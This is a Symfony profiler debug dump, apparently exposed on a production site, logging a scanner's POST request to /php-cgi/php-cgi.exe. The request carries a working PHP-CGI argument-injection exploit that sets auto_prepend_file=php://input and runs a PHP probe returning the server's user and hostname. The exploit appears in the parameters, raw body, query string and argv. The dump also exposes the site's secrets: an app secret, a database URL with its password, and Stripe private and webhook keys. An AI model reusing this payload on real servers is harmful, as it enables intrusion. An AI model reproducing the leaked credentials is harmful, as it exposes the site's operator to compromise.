n/a
Request
GET Parameters
| Key | Value |
|---|---|
| �d_cgi_force_redirect=0_�d_disable_functions=""_�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
| Key | Value |
|---|---|
| <?php_$env | [ ""USERNAME"" => " @get_current_user(); $env["HOSTNAME"] = @gethostname(); $env['USERNAME_SIGN'] = @md5($env["USERNAME"]); echo @json_encode($env); @die(); ?>" ] |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _remove_csp_headers | true |
| _stopwatch_token | "b66ee2" |
Request Headers
| Header | Value |
|---|---|
| accept-encoding | "gzip" |
| content-length | "164" |
| content-type | "application/x-www-form-urlencoded" |
| host | "hub.premiumbeautynews.com" |
| remote-ip | "147.182.149.75" |
| user-agent | "Mozilla/5.0 (l9scan/2.0.6313e23333e2638313e2331323; +https://leakix.net)" |
| x-forwarded-for | "147.182.149.75" |
| x-forwarded-proto | "https" |
| x-ovhrequest-id | "9f65d153c375ba3f87be5610497815c7" |
| x-php-ob-level | "1" |
| x-predictor | "1" |
Request Content
Raw
<?php $env["USERNAME"] = @get_current_user(); $env["HOSTNAME"] = @gethostname(); $env['USERNAME_SIGN'] = @md5($env["USERNAME"]); echo @json_encode($env); @die(); ?>
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Wed, 12 Nov 2025 22:19:23 GMT" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2Fhub.premiumbeautynews.com%2Fphp-cgi%2Fphp-cgi.exe%22" |
| x-debug-exception-file | "%2Fhome%2Fpremiumb%2Fhub%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "539ddd" |
| x-debug-token-link | "https://hub.premiumbeautynews.com/_profiler/45c0b8" |
| x-previous-debug-token | "45c0b8" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "4eac4933b5ad63d5622c827ddfd4fb89" |
| DATABASE_URL | "mysql://hubuser:HUBpwd2021@gv20616-001.privatesql:35474/hubsymfo?serverVersion=5.7" |
| MAILER_DSN | "sendmail://default" |
| STRIPE_PRIVATEKEY | "sk_test_51GQcsRDVVbfaQecdj9Pfn9OIrFoh33GTLmOcpIOOrpoXvoFucuFfDpr84Ppj3I8tOtdpN5HfFrZCGOgaRVVFcHnM00AZHBp8ru" |
| STRIPE_PUBLICKEY | "pk_test_KNLZzlFcBWlKCP6ZpdHt9xpL00627sUeco" |
| STRIPE_WEBHOOKKEY | "whsec_rPTT3EIcANnLA1igMgxIEClirDqfRwas" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CFG_CLUSTER | "cluster105" |
| CONTENT_LENGTH | "164" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| DOCUMENT_ROOT | "/home/premiumb/hub/public" |
| ENVIRONMENT | "production" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| GEOIP_AREA_CODE | "0" |
| GEOIP_CITY | "Toronto" |
| GEOIP_COUNTRY_CODE | "CA" |
| GEOIP_COUNTRY_NAME | "Canada" |
| GEOIP_DMA_CODE | "0" |
| GEOIP_LATITUDE | "43.654701" |
| GEOIP_LONGITUDE | "-79.362297" |
| GEOIP_REGION | "ON" |
| HTTPS | "on" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_HOST | "hub.premiumbeautynews.com" |
| HTTP_REMOTE_IP | "147.182.149.75" |
| HTTP_USER_AGENT | "Mozilla/5.0 (l9scan/2.0.6313e23333e2638313e2331323; +https://leakix.net)" |
| HTTP_X_FORWARDED_FOR | "147.182.149.75" |
| HTTP_X_FORWARDED_PROTO | "https" |
| HTTP_X_OVHREQUEST_ID | "9f65d153c375ba3f87be5610497815c7" |
| HTTP_X_PREDICTOR | "1" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input" |
| REDIRECT_QUERY_STRING | "%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input" |
| REDIRECT_STATUS | "200" |
| REDIRECT_URL | "/php-cgi/php-cgi.exe" |
| REMOTE_ADDR | "147.182.149.75" |
| REMOTE_PORT | "47314" |
| REQUEST_METHOD | "POST" |
| REQUEST_TIME | 1762985963 |
| REQUEST_TIME_FLOAT | 1762985963.6724 |
| REQUEST_URI | "/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input" |
| SCRIPT_FILENAME | "/home/premiumb/hub/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SCRIPT_URI | "https://hub.premiumbeautynews.com:443/php-cgi/php-cgi.exe" |
| SCRIPT_URL | "/php-cgi/php-cgi.exe" |
| SERVER_ADDR | "10.105.40.4" |
| SERVER_ADMIN | "postmaster@hub.premiumbeautynews.com" |
| SERVER_NAME | "hub.premiumbeautynews.com" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,MAILER_DSN,DATABASE_URL,STRIPE_PRIVATEKEY,STRIPE_PUBLICKEY,STRIPE_WEBHOOKKEY" |
| UNIQUE_ID | "aRUH6-bIKzxOrTEpENM3SQAAAHY" |
| USER | "premiumb" |
| argc | 8 |
| argv | [ "%ADd" "cgi.force_redirect%3D0" "%ADd" "disable_functions%3D""" "%ADd" "allow_url_include%3D1" "%ADd" "auto_prepend_file%3Dphp://input" ] |